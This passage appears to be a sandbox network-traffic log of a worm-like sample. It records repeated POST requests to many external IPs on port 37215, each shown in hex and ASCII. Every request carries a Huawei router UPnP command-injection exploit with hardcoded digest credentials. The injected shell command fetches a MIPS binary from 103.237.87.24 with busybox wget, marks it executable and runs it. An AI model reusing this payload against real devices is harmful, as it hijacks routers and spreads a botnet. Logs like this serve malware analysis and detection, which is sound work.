                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1111192.168.2.1360480197.152.108.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433613062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1112192.168.2.1350388157.111.219.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433623075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1113192.168.2.1350578151.133.51.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433639050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1114192.168.2.1333226157.66.58.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433655024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1115192.168.2.1348956197.194.40.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433664083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1116192.168.2.1353076197.199.203.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433677912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1117192.168.2.1339770157.185.70.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433686018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1118192.168.2.1333258197.141.90.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433706045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1119192.168.2.135456244.79.55.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433718920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1120192.168.2.1341232197.132.19.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433729887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 